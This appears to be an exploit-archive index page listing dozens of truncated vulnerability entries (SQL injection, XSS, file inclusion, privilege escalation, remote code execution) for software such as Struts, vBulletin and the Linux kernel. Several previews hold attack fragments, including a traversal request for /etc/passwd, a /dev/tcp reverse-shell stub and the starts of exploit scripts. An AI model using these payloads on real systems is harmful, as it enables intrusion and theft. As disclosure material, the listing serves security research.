PHP-Fusion 4.01 - readmore.php SQL Injection

PHP-Fusion 4.01 - readmore.php SQL Injection source: https://www.securityfocus.com/bid/30680/info PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...

Annuaire 1Two 1.01.1 - index.php Cross-Site Scripting

Annuaire 1Two 1.01.1 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/13961/info Annuaire 1Two is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issu...

DUclassmate 1.x - account.asp?MM-recordId Arbitrary Password Modification

DUclassmate 1.x - account.asp?MM-recordId Arbitrary Password Modification source: https://www.securityfocus.com/bid/11363/info Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also...

Sync Breeze Enterprise 12.4.18 - Sync Breeze Enterprise Unquoted Service Path

Sync Breeze Enterprise 12.4.18 - Sync Breeze Enterprise Unquoted Service Path Exploit Title: Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: http://www.syncbreeze.com Software Link:...

OpenBSD 6.x - Dynamic Loader Privilege Escalation

OpenBSD 6.x - Dynamic Loader Privilege Escalation Qualys Security Advisory Local Privilege Escalation in OpenBSD's dynamic loader CVE-2019-19726 ============================================================================== Contents...

ICE HRM 23.0 - Multiple Vulnerabilities

ICE HRM 23.0 - Multiple Vulnerabilities =========================================================================================== Exploit Title: ICE HRM - ’ob’ SQL Inj. Dork: N/A Date: 14-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: http://icehrm.org Software Link:...

SoftDatepro Dating Social Network 1.3 - SQL Injection

SoftDatepro Dating Social Network 1.3 - SQL Injection Exploit Title: SoftDatepro Dating Social Network 1.3 - SQL Injection Dork: N/A Date: 30.10.2017 Vendor Homepage: http://www.softdatepro.com/ Software Link: https://codecanyon.net/item/softdatepro-build-your-own-dating-social-network/3650044...

Python smtplib 2.7.11 3.4.4 3.5.1 - Man In The Middle StartTLS Stripping

Python smtplib 2.7.11 3.4.4 3.5.1 - Man In The Middle StartTLS Stripping VuNote ============ Author: Version: 0.2 Date: Nov 25th, 2015 Tag: python smtplib starttls stripping mitm Overview -------- Name: python Vendor: python software foundation References: https://www.python.org/ 1 Version: 2.7.1...

Book Gallery - aboutbook.php SQL Injection

Book Gallery - aboutbook.php SQL Injection Title: Book Gallery aboutbook.php SQL Injection Vulnerability Version: 1.0 Author: Mr.P3rfekT Software Link:N/A Tested on Lunix CVE : N/A Founded By Mr.P3rfekT Helllo Allz Exploit : http://127.0.0.1/path/aboutbook.php?id= == SQLi sh done MaiL...

mxBB Module kb_mods 2.0.2 - Remote File Inclusion

mxBB Module kbmods 2.0.2 - Remote File Inclusion | \ | / | \ \ / | | | | | \ / | \ \ / / | | | | '| | |/| |/ \ / / \ / / | | '| | | / | | || | | | | | | | | \ / | | | | || \ \ |/|| || ||,//\ / ||| ,|/...

A-Cart Pro 2.0 - product.asp?ProductID SQL Injection

A-Cart Pro 2.0 - product.asp?ProductID SQL Injection source: https://www.securityfocus.com/bid/21166/info A-Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an...

Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)

Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass Config Upload Exploit Title: Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass Config Upload Date: 2019-11-20 Exploit Author: Elber Tavares Vendor Homepage: https://www.intelbras.com/ Software Link:...

netkit-telnet-0.17 telnetd (Fedora 31) - BraveStarr Remote Code Execution

netkit-telnet-0.17 telnetd Fedora 31 - BraveStarr Remote Code Execution !/usr/bin/env python3 BraveStarr ========== Proof of Concept remote exploit against Fedora 31 netkit-telnet-0.17 telnetd. This is for demonstration purposes only. It has by no means been engineered to be reliable: 0xff bytes ...

microsoft.com

Pentest notes for: microsoft.com Exploit Pack Nmap 7.80 scan initiated Tue Dec 3 09:27:33 2019 as: /usr/bin/nmap -sV -A -oA log/exploitpack.com exploitpack.com Nmap scan report for exploitpack.com 132.148.22.104 Host is up 0.18s latency. rDNS record for 132.148.22.104:...

Ayukov NFTP client 1.71 - SYST Buffer Overflow

Ayukov NFTP client 1.71 - SYST Buffer Overflow Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow Date: 2019-11-03 Exploit Author: Chase Hatch SYANiDE Vendor Homepage: http://ayukov.com/nftp/ Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe Version: 1.71 Tested o...

Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)

Microsoft Windows 10 Build 17134 - Local Privilege Escalation UAC Bypass include "stdafx.h" include include "resource.h" void DropResourceconst wchart rsrcName, const wchart filePath HMODULE hMod = GetModuleHandleNULL; HRSRC res = FindResourcehMod, MAKEINTRESOURCEIDRDATA1, rsrcName; DWORD dllSize...

SquirrelMail 1.4.22 - Remote Code Execution

SquirrelMail 1.4.22 - Remote Code Execution !/bin/bash int='\03394m / / / / / / / / / / / / / / / / / / // / / / /// / / / / // / // / // / / / / // / // , / / / ///, /,// // //,///||// // // SquirrelMail = 1.4.23 Remote Code Execution PoC Exploit CVE-2017-7692 SquirrelMailRCEexploit.sh...

Joomla! Component Link Directory 1.0.3 - Remote File Inclusion

Joomla! Component Link Directory 1.0.3 - Remote File Inclusion .: insecurity research team :. ....:...:. . .:. | |/ :/ // :/ .:. : | | | \\ /\ / :. . ..: ||| / \ \ .: .:.. .. ./ .:/:. ./. .:/: . ...:. .advisory. .:... :..................: 18.o8.2oo6 .. Affected Application: Link Directory...

ASUS AXSP 1.02.00 - asComSvc Unquoted Service Path

ASUS AXSP 1.02.00 - asComSvc Unquoted Service Path Exploit Title: ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path Discovery by: Roberto Piña Discovery Date: 2020-03-10 Vendor Homepage: https://www.asus.com/ Software Link...

gSOAP 2.8 - Directory Traversal

gSOAP 2.8 - Directory Traversal Title: gSOAP 2.8 - Directory Traversal Author: Numan Türle Date: 2019-11-13 Vendor Homepage: https://www.genivia.com/ Version : gSOAP 2.8 Software Link : https://www.genivia.com/products.htmlgsoap POC --------- GET /../../../../../../../../../etc/passwd HTTP/1.1...

BulletProof FTP Server 2019.0.0.50 - Storage-Path Denial of Service (PoC)

BulletProof FTP Server 2019.0.0.50 - Storage-Path Denial of Service PoC Exploit Title: BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-05-18 Vendor Homepage: http://bpftpserver.com/ Software Link:...

Git Submodule - Arbitrary Code Execution (PoC)

Git Submodule - Arbitrary Code Execution PoC These releases fix a security flaw CVE-2018-17456, which allowed an attacker to execute arbitrary code by crafting a malicious .gitmodules file in a project cloned with --recurse-submodules. When running "git clone --recurse-submodules", Git parses the...

Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution

Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution function asmjsmodule "use asm"; / huge jitted nop sled / function payloadcode var val = 0; val = val + 0xa8909090|0; val = val + 0xa8909090|0; val = val + 0xa8909090|0; val = val + 0xa8909090|0; val = val + 0xa8909090|0; val = val +...

Apache Struts 2.3.x Showcase - Remote Code Execution

Apache Struts 2.3.x Showcase - Remote Code Execution !/usr/bin/python -- coding: utf-8 -- Just a demo for CVE-2017-9791 import requests def exploiturl, cmd: print"+ command: %s" % cmd payload = "%" payload += "[email protected]@DEFAULTMEMBERACCESS." payload += "memberAccess?memberAccess=dm:"...

Linux Kernel (Debian 78910 Fedora 232425 CentOS 5.35.116.06.87.2.1511) - ldso_hwcap Stack Clash Local Privilege Escalation

Linux Kernel Debian 78910 Fedora 232425 CentOS 5.35.116.06.87.2.1511 - ldsohwcap Stack Clash Local Privilege Escalation / Linuxldsohwcap.c for CVE-2017-1000366, CVE-2017-1000370 Copyright C 2017 Qualys, Inc. myimportanthwcaps adapted from elf/dl-hwcaps.c, part of the GNU C Library: Copyright C...

PHPDirector Game Edition - game.php SQL Injection

PHPDirector Game Edition - game.php SQL Injection PHPDirector Game Edition game.php Sql Injection Vulnerability ================================================================ .:. Author : AtT4CKxT3rR0r1ST [email protected] .:. Script :...

VMware Remote Console e.x.p build-158248 - Format String

VMware Remote Console e.x.p build-158248 - Format String DSECRG-09-053 VMware Remote Console - format string vulnerability http://www.dsecrg.com/pages/vul/show.php?id=153 VMrc vulnerable to format string attacks. Exploitation of this issue may lead to arbitrary code execution on the system where...

jetty 6.x 7.x - Cross-Site Scripting Information Disclosure Injection

jetty 6.x 7.x - Cross-Site Scripting Information Disclosure Injection Jetty 6.x and 7.x Multiple Vulnerabilities Name Multiple Vulnerabilities in Jetty Systems Affected Jetty 7.0.0 and earlier versions Severity Medium Impact CVSSv2 Medium 5/10, vector: AV:N/AC:L/Au:N/C:P/I:N/A:N Vendor...

ProductCart 1.x2.x - Custva.asp?redirectUrl Cross-Site Scripting

ProductCart 1.x2.x - Custva.asp?redirectUrl Cross-Site Scripting source: https://www.securityfocus.com/bid/9669/info EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues...

rConfig 3.93 - ajaxAddTemplate.php Authenticated Remote Code Execution

rConfig 3.93 - ajaxAddTemplate.php Authenticated Remote Code Execution Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Date: 2020-03-08 Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp//...

CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow

CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow Exploit Title: CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow Exploit Author: wetw0rk Exploit Version: Public POC Vendor Homepage:...

vBulletin 5.0 5.5.4 - updateAvatar Authenticated Remote Code Execution

vBulletin 5.0 5.5.4 - updateAvatar Authenticated Remote Code Execution ?php / --------------------------------------------------------------------- vBulletin = 5.5.4 updateAvatar Remote Code Execution Vulnerability ---------------------------------------------------------------------...

FaceSentry Access Control System 6.4.8 - Remote SSH Root

FaceSentry Access Control System 6.4.8 - Remote SSH Root !/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote SSH Root Access Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2...

Python - socket.recvfrom_into() Remote Buffer Overflow

Python - socket.recvfrominto Remote Buffer Overflow !/usr/bin/env python ''' Exploit Title: python socket.recvfrominto remote buffer overflow Date: 21/02/2014 Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-19...

Whatsapp 2.19.216 - Remote Code Execution

Whatsapp 2.19.216 - Remote Code Execution Exploit Title: Whatsapp 2.19.216 - Remote Code Execution Date: 2019-10-16 Exploit Author: Valerio Brussani @valbrux Vendor Homepage: https://www.whatsapp.com/ Version: include include include typedef uint8t byte; char gadgetp; void libc, lib; //dls...

AppXSvc - Privilege Escalation

AppXSvc - Privilege Escalation ----------------------------------------------------------------------------- Exploit Title: AppXSvc - Arbitrary File Security Descriptor Overwrite EoP Date: Sep 4 2019 Exploit Author: Gabor Seljan Vendor Homepage: https://www.microsoft.com/ Version:...

Cisco Network Assistant 6.3.3 - Cisco Login Denial of Service (PoC)

Cisco Network Assistant 6.3.3 - Cisco Login Denial of Service PoC Exploit Title: Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-08-27 Vendor Homepage: https://www.cisco.com/ Software Link :...

Android Bluetooth - Blueborne Information Leak (2)

Android Bluetooth - Blueborne Information Leak 2 from pwn import import bluetooth if not 'TARGET' in args: log.info"Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX" exit target = args'TARGET' servicelong = 0x0100 serviceshort = 0x0001 mtu = 50 n = 30 def packetservice, continuationstate: pkt =...

OpenNetAdmin 13.03.01 - Remote Code Execution

OpenNetAdmin 13.03.01 - Remote Code Execution Exploit Title: OpenNetAdmin Remote Code Execution Date: 03/04/13 Exploit Author: Mandat0ry aka Matthew Bryant Vendor Homepage: http://opennetadmin.com/ Software Link: http://opennetadmin.com/download.html Version: 13.03.01 Tested on: Ubuntu CVE : No C...

Joomla! Component mod_spo - SQL Injection

Joomla! Component modspo - SQL Injection Exploit Title: Simple Page Option LFI Google Dork: inurl:modspo Date: 15/07/2011 Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/modspo1.5.16.zip Version: 1.5.x Tested on:...

Joomla! Component Artlinks 1.0b4 - Remote File Inclusion

Joomla! Component Artlinks 1.0b4 - Remote File Inclusion .: insecurity research team :. ....:...:. . .:. | |/ :/ // :/ .:. : | | | \\ /\ / :. . ..: ||| / \ \ .: .:.. .. ./ .:/:. ./. .:/: . ...:. .advisory. .:... :..................: 18.o8.2oo6 .. Affected Application: Artlinks v1.0 Beta 4...

Oracle Solaris 11.111.3 (RSH) - Stack Clash Local Privilege Escalation

Oracle Solaris 11.111.3 RSH - Stack Clash Local Privilege Escalation / Solarisrsh.c for CVE-2017-3630, CVE-2017-3629, CVE-2017-3631 Copyright C 2017 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published ...

Freepbx 2.11.1.5 - Remote Code Execution

Freepbx 2.11.1.5 - Remote Code Execution Exploit Title: Freepbx coockie recordings injection Google Dork: Ask Santa Date: 23/12/2016 Exploit Author: inj3ctor3 Vendor Homepage: https://www.freepbx.org/ Software Link: ISO LINKS IN SITE https://www.freepbx.org/ Version: ALL && unpatched/...

Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)

Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation 2 / Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings Date: 19/1/2016 Exploit Author: Perception Point Team CVE : CVE-2016-0728 / / CVE-2016-0728 local root exploit modified by...

IPComp - encapsulation Kernel Memory Corruption

IPComp - encapsulation Kernel Memory Corruption // source: http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload -------------------------------------------------------------------------------...

PozScripts Classified Auctions - gotourl.php?id SQL Injection

PozScripts Classified Auctions - gotourl.php?id SQL Injection | | | Classified Auctions gotourl.php id Remote SQL Injection Vulnerability | | |---------------- Hussin X ------------------ | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email: darkangelg85atYahooDoTcom | | | | script :...

3editor CMS 0.42 - index.php Local File Inclusion

3editor CMS 0.42 - index.php Local File Inclusion script Name: 3editor CMS index.php Local File Include Exploit Download:http://www.matteolucarelli.net/3editor/index.htm Author : Dr Max Virus Contact :[email protected] Bug & Problem In file index.php Let's Take a look; if !isset$GET'page'...

paBugs 2.0 Beta 3 - class.mysql.php Remote File Inclusion

paBugs 2.0 Beta 3 - class.mysql.php Remote File Inclusion ?php / ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:...

Virtual Programming VP-ASP 45 - shopdisplayproducts.asp Cross-Site Scripting

Virtual Programming VP-ASP 45 - shopdisplayproducts.asp Cross-Site Scripting source: https://www.securityfocus.com/bid/9164/info A vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this...

Linux Kernel (Ubuntu 17.04) - XFRM Local Privilege Escalation

Linux Kernel Ubuntu 17.04 - XFRM Local Privilege Escalation Vulnerability Summary The following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem – XFRM. Netlink is used to transfer...